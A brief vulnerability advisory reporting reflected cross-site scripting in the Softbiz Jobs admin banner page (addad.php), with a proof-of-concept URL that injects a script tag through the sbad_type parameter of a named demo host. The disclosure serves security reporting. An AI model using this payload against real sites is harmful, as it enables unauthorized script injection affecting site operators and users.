Text :  

Softbiz Jobs XSS Vulnerability

by

Pratul Agrawal


# Vulnerability found in- Insert New Banner module

# email Pratulag@yahoo.com

# company aksitservices

# Credit by Pratul Agrawal

# Download http://www.softbizscripts.com/

# Script softbizscripts

# URL
http://demos1.softbiz.com/scripts/seojobs/admin/addad.php?sbad_type=top



# Proof of concept




...........................................................................
........................................


http://demos1.softbiz.com/scripts/seojobs/admin/addad.php?sbad_type=[XSS
SCRIPT]



...........................................................................
........................................


Example-


...........................................................................
........................................



http://demos1.softbiz.com/scripts/seojobs/admin/addad.php?sbad_type="&
gt;<script>alert(123)</script>


...........................................................................
........................................




#If you have any questions, comments, or concerns, feel free to contact me.

  References :  

None